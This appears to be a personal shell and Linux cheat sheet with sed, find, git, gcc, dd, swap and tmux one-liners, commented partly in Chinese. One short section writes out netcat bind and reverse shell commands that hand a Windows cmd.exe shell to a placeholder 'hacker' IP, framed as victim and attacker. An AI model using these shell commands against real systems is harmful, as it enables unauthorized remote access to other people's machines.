#set LS_COLORS
export LS_COLORS="no=00:fi=00:di=01;34:ln=00;04;31:pi=00;37:so=01;31:bd=37:cd=37:or=01;31:ex=01;31:*.o=01:*.gz=00;35:*.tar=00;35:*.Z=00;35:*.tgz=00;35:*.mpg=36:*.mpeg=36:*.dat=35:*.mov=35:*.pm=35:*.jpg=36:*.JPG=36:*.gif=36:*.GIF=36:*.ps=01;33:*.pdf=01;35:*.fm=01;35:*.htm=01;34:*.html=01;34:*.HTM=01;34:*.HTML=01;34:*.c=00;31:*.cpp=00;31:*.pl=00;31:*.my=01;04;35:*.man=01;04;07;30:*.ppt=35:*.DOC=35:*.doc=35:*.cmd=04;35:*.tcl=04;36:*.tclscript=04;36:*.log=04;35"

#替换目录下所有文件中的的匹配字符串
find ./driver/ ./system/ ./include/ ./test/ | grep ".*\.[ch]$" | xargs sed -i 's/uart_printf/PRINT_EMG/g'

#delete space at the end of line
sed -i 's/[ ]*$//g'

#modify line 1234
sed -i '1234creplacedtext' file

#delete last line
sed -i '$d' file

# count .c .h lines
find . | egrep ".*\.c$|.*\.h$" | xargs wc -l

#sed删除行尾空格
sed -i 's/[ \t]*$//g' file

#sed 文件顶部增加一行
sed -i '1s/^/abcdefg\n/' file

#递归搜索，替换
find . -type f -name '*.txt' -exec sed -i 's/this/that/g' {} +

#git
git config --global user.name "wuxx"
git config --global user.email "wujianhua0924@gmail.com"

git config --global alias.st status
git config --global alias.ci commit
git config --global alias.co checkout
git config --global alias.br branch  
git config --global alias.lg "log --color --graph --pretty=format:'%Cred%h%Creset -%C(yellow)%d%Creset %s %Cgreen (%cr) %C(bold blue)<%an>%Creset' --abbrev-commit --"  
git config --global color.ui true 
git config --global core.editor vim

git stash save -u

git bisect start
git bisect good
git bisect bad <SHA-1>
then...
git bisect good or git bisect bad

#mov to one commit id temporary
git checkout <SHA-1>
#mov back to master
git checkout master

git branch --set-upstream-to=origin/master master

#multi github account in one PC. ssh
http://jingyan.baidu.com/article/948f592414ad67d80ef5f966.html

#sparse checkout
https://www.cnblogs.com/liangzai-cool/p/5821138.html

#delete the untracked file
git clean -fd  
git clean -nfd   #like make -n, just show what will be done, not actually do.

#gcc predefined macro
gcc -dM -E - < /dev/null

#dump optimizers
gcc -Q --help=optimizers -O1

#python 2.7 simple http server
python -m SimpleHTTPServer 8080
#python 3 simple http server
python -m http.server 8080

#make raspberry pi image
sudo dd if=./2015-05-05-raspbian-wheezy.img of=/dev/sdb bs=2M

#get 8K random data
dd if=/dev/urandom of=data.bin bs=8K count=1

#get the internet address on my router
curl -u admin:admin http://192.168.1.1/userRpm/StatusRpm.htm | grep -A1 "6C-E8-73-6F-A6-D5" | tail -n 1 | sed 's/,//'

#edit the hex file
#hex view
%!xxd

#save
%!xxd -r

#set the timezone on debian linux system
dpkg-reconfigure tzdata

#starting with the Kth of each file (count start from 1)
tail -c +K file

#putty serial
putty -serial COM7 -sercfg 115200,8,n,1,X

#xargs
ls mifare/javacard/*.cap | xargs -I '{}' ./readcap {} > 1.log

#ssh tunnel
on local machine
ssh -N -f -o TCPKeepAlive=yes -R 2222:127.0.0.1:22  root@internet_ip

on internet machine
ssh pi@127.0.0.1 -p 2222

#delete file accord the inum
find ./ -inum 919102 -exec rm -rfi {} \;

#search head file
apt-file search xxx.h

#screen
[C-a] D to detach
screen -ls
screen -r id

#nc shell
#the victim listen
nc.exe -l -p 8000 -t -e cmd.exe
#the hacker get the shell
nc xxx.xxx.xxx.xxx 8000

#nc reverse shell
#the hacker wait
nc -vv -l -p 8000
#the victim  connect
nc.exe -t -e cmd.exe xxx.xxx.xxx.xxx 8000

#nc file trans
nc -l -p  8000 > test.txt
nc dst_ip 8000 < test.txt    

#add swap space
cd /var
# 先关闭
sudo swapoff /var/swap
# 重新设置大小1M * 1024 = 1G
sudo dd if=/dev/zero of=swap bs=1M count=1024
# 格式化
sudo mkswap /var/swap
#开启
sudo swapon /var/swap
# 查看当前已生效的swap
swapon -s
# 查看当前swap使用情况
free -m


#make ramdisk
$sudo mke2fs /dev/ram0 /^C
$sudo mkdir /mnt/ramdisk0
$sudo mount /dev/ram0 /mnt/ramdisk0/

#mount ram-base fs
$mount tmpfs /mnt -t tmpfs -o size=512M

#show symbol debug info
LD_DEBUG=symbols ./xxx.elf

tmux 
detach the session
ctrl+b d
tmux a -t session-name
#cheetsheet
http://blog.csdn.net/hcx25909/article/details/7602935

ln -sf target link-name

#ubuntu16.04 turn off gui interface
http://blog.51cto.com/verdureorange/1771036
#turn off
systemctl disable lightdm.service
#turn on
sudo ln -s /lib/systemd/system/lightdm.service /etc/systemd/system/display-manager.service

#change user name
http://www.jianshu.com/p/11cd3564855c
